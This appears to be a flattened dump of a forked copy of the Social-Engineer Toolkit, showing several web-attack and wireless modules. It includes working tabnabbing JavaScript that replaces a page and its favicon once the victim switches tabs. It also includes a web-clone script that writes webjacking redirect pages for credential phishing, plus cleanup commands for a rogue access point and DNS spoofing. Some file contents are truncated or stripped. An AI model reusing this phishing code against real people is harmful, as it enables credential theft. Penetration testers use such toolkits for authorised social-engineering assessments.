| print_info("This feature is currently under development and disabled.") 10 | return_continue() 11 | 12 | prep_website() 13 | -------------------------------------------------------------------------------- /src/webattack/tabnabbing/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/tabnabbing/__init__.py -------------------------------------------------------------------------------- /src/webattack/tabnabbing/source.js: -------------------------------------------------------------------------------- 1 | (function(){ 2 | 3 | var TIMER = null; 4 | var HAS_SWITCHED = false; 5 | 6 | window.onblur = function(){ 7 | TIMER = setTimeout(changeItUp, 1000); 8 | } 9 | 10 | window.onfocus = function(){ 11 | if(TIMER) clearTimeout(TIMER); 12 | } 13 | 14 | favicon = { 15 | docHead: document.getElementsByTagName("head")[0], 16 | set: function(url){ 17 | this.addLink(url); 18 | }, 19 | 20 | addLink: function(iconURL) { 21 | var link = document.createElement("link"); 22 | link.type = "image/x-icon"; 23 | link.rel = "shortcut icon"; 24 | link.href = iconURL; 25 | this.removeLinkIfExists(); 26 | this.docHead.appendChild(link); 27 | }, 28 | 29 | removeLinkIfExists: function() { 30 | var links = this.docHead.getElementsByTagName("link"); 31 | for (var i=0; i\n') 73 | filewrite1.write("\n") 74 | filewrite1.write("Please wait while the site loads...\n") 75 | filewrite1.write("\n") 76 | filewrite1.close() 77 | 78 | # define webjacking or multi webjacking here 79 | if attack_vector == "webjacking" or multi_webjacking == "on": 80 | filewrite1=file(setdir + "/web_clone/index.html", "w") 81 | filewrite1.write("\n") 86 | filewrite1.write('''

The site %s has moved, click here to go to the new location.

\n''' % (URL,webjacking_timing,URL)) 87 | filewrite1.close() 88 | -------------------------------------------------------------------------------- /src/webattack/web_clone/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/web_clone/__init__.py -------------------------------------------------------------------------------- /src/webattack/web_clone/applet.database: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/webattack/web_clone/applet.database.old: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/webattack/web_clone/applet.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | // 1 = WINDOWSPLZ 5 | // 2 = ILIKESTUFF 6 | // 3 = OSX 7 | // 4 = LINUX 8 | // 5 = X64 9 | // 6 = X86 10 | // 7 = HUGSNOTDRUGS 11 | // 8 = LAUNCH 12 | // 9 = nextPage 13 | 14 | 15 | -------------------------------------------------------------------------------- /src/webattack/web_clone/repeater.database: -------------------------------------------------------------------------------- 1 | 29 | -------------------------------------------------------------------------------- /src/webattack/web_clone/unc.database: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/wireless/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/wireless/__init__.py -------------------------------------------------------------------------------- /src/wireless/airbase-ng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/wireless/airbase-ng -------------------------------------------------------------------------------- /src/wireless/stop_wifiattack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | from src.core.setcore import * 5 | 6 | # 7 | # Simple python script to kill things created by the SET wifi attack vector 8 | # 9 | 10 | interface = raw_input(setprompt(["8"], "Enter your wireless interface (ex: wlan0): ")) 11 | 12 | # fix a bug if present 13 | print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.") 14 | subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (interface), shell=True).wait() 15 | 16 | print_status("Killing airbase-ng...") 17 | subprocess.Popen("killall airbase-ng", shell=True).wait() 18 | 19 | print_status("Killing dhcpd3 and dhclient3...") 20 | subprocess.Popen("killall dhcpd3", shell=True).wait() 21 | subprocess.Popen("killall dhclient3", shell=True).wait() 22 | 23 | print_status("Killing dnsspoof...") 24 | subprocess.Popen("killall dnsspoof", shell=True).wait() 25 | 26 | print_status("Turning off IP_forwarding...") 27 | subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait() 28 | 29 | print_status("Killing monitor mode on mon0...") 30 | subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait() 31 | 32 | print_status("Turning off monitor mode on wlan0...") 33 | subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait() 34 | 35 | print_status("SET has stopped the wireless access point. ") 36 | return_continue() 37 | --------------------------------------------------------------------------------